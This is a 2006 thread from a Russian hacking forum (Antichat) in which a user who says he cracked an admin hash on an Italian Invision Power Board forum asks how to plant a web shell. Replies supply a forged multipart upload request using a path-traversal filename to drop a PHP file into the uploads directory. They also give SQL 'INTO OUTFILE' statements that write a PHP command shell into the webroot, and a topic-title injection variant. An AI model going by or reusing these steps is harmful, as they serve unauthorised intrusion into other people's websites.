Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final |
06.01.2006, 16:18
|
|
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939
Репутация:
-4
|
|
Вопрос о заливке шелла на форуме Powered by Invision Power Board(U) v1.3 Final
Powered by Invision Power Board(U) v1.3 Final
короче получил хеш,расшифровал,захожу в админку,в смайлики пытаюсь закачать шелл пишет :
Upload Fallito!
пытался настраивать разрешенные типы файлов( разрешал *.phtml) и всё равно не пашет,может на форуме были подобные темы,но просьба мне дать нормальное объяснение как закачать шелл в таких обстоятельствах =)
плизз
|
|
|
06.01.2006, 16:35
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
Если залить шелл в папку со смайликами не удаётся (папка закрыта на запись), то тогда попробуй через подделку HTTP запросов залить в папку uploads. Как это сделать читай тут: http://antichat.ru/txt/IPB/index2.php
ЗЫ: И таких тем полно по форуму! Не ленись пользоваться поиском! Вот к примеру: http://forum.antichat.ru/thread11725.html |
|
|
|
06.01.2006, 17:42
|
|
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939
Репутация:
-4
|
|
Хех, ну скорее всего он пишет Upload Failed, а не то, что написал ты...
как раз Upload Fallito!,форум итальянский..
я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся
|
|
|
|
06.01.2006, 17:52
|
|
Постоянный
Регистрация: 03.11.2005
Сообщений: 591
Провел на форуме:
5605982
Репутация:
523
|
|
Сообщение от 0verfe1
я это видел раньше,но всё как-то там замудренно,я думаю ща придётся разбиратся
"Замудренно"? Там всё так расписано, что не суметь повторить этого я думаю очень сложно. Статья написана очень подробно и понятно имхо.
Последний раз редактировалось FQziT; 06.01.2006 в 17:56..
|
|
|
|
06.01.2006, 18:19
|
|
Новичок
Регистрация: 28.08.2005
Сообщений: 27
Провел на форуме:
63939
Репутация:
-4
|
|
POST http://someSiteForum/admin.php?adses...1f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adses...ct=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=--------------------------- 7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;
----------------------------- 7d43942c405bc
Content-Disposition: form-data; name="adsess"
7456d367b18da87d161f59424a4e96f7
----------------------------- 7d43942c405bc
Content-Disposition: form-data; name="code"
emo_upload
----------------------------- 7d43942c405bc
Content-Disposition: form-data; name="act"
op
---------------------------- -7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"
10000000000
----------------------------- 7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream
<% echo("Hello from injected PHP script") %>
----------------------------- 7d43942c405bc-- вот мне только не понятно 7d43942c405bc что это за значение ? и откуда я его могу взять ? без него отправить получилось но скрипта на месте не оказалось..
|
|
|
|
06.01.2006, 18:43
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219
Репутация:
36
|
|
Попробуй залить через mysql. Где-то на рстшном форуме была статейка, ну примерно вот так:
create table ibf_shell(myshell char(50));
Insert into ibf_shell(myshell) values('<?тут пишешь php-команды, типа system("id")?>');
Select myshell from ibf_shell into outfile 'тут полный путь к файлу, типа /home/qwerty/www/uploads/cmd.php';
Если прав на аутфайл хватит, то считай что тебе повезло. Кроме того, ели включены register_globals, то можешь ввести что-то типа этого system($_GET)(вроде так). НО!
Я юзал так несколько форумов, и прав на вывод в outfile у меня не хватало, т.е. было
permission denied for user admin@localhost  .
Если помог - ткни на репутацию...  |
|
|
|
06.01.2006, 21:54
|
|
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463
Репутация:
2258
|
|
да ты прав такой способ катит...еще один вариант создаешь темку с названием
<? $_GET[cmd]; ?>
потом с тем же outfile-ом выводишь эти строки в файл, просто надо тада запомнить столбец в котором нах-ся названия тем(я в мускуле не силен надеюсь прально сказал=)))
__________________
Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze
|
|
|
|
07.01.2006, 03:23
|
|
Участник форума
Регистрация: 25.12.2005
Сообщений: 146
Провел на форуме:
123219
Репутация:
36
|
|
Повторюсь, если админ не полный кретин, то прав на вывод в outfile не хватит
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
